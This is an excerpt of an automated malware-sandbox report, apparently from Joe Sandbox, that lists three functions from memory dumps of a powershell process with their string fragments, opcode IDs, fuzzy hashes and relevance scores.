                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$]$tP^q$tP^q
                                                        • API String ID: 0-1646045720
                                                        • Opcode ID: f7e30c2d079aa3448c93deaf809a309527224b86fcdfd5ea572f8d7bddf39f5d
                                                        • Instruction ID: c960a5de764a49f8097f2cf1a2828cbcf6c5e9ab496f664edd9cbde2d2f45d40
                                                        • Opcode Fuzzy Hash: f7e30c2d079aa3448c93deaf809a309527224b86fcdfd5ea572f8d7bddf39f5d
                                                        • Instruction Fuzzy Hash: 61713833F483A59FDBA4CB6C9400B66BBE2AFC6710F1484AAD505CF351DA31D885C7A1
                                                        Function 06F30309 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$$^q$$^q
                                                        • API String ID: 0-2831958266
                                                        • Opcode ID: 737c1e8bb82470625be1b9f53312ac3aac57d1a831629957906265c2a766130b
                                                        • Instruction ID: cebfc8e9c64042205a36a9afd86fedcc0d77985aff092700da59883bf919fee8
                                                        • Opcode Fuzzy Hash: 737c1e8bb82470625be1b9f53312ac3aac57d1a831629957906265c2a766130b
                                                        • Instruction Fuzzy Hash: DD114811B493A95FD76F223C28205996FF65BC255031904EBD041CF35BCD108C8AC3A2
                                                        Function 06F35BC8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2215887870.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_6f30000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: 53ea9ceb89d6333c9f008bd88dc706215610d62e3911fd8960b455ca0af45b3e
                                                        • Instruction ID: f39992ed37dfd27de0c3c0a0d6dbac82552fba0f73a01fe40c07f90c8e0dbc2b
                                                        • Opcode Fuzzy Hash: 53ea9ceb89d6333c9f008bd88dc706215610d62e3911fd8960b455ca0af45b3e
                                                        • Instruction Fuzzy Hash: F9212736F003295BDBA4597E9800B27BADA9FC0759F24882AA805DF385DE36C845C3A1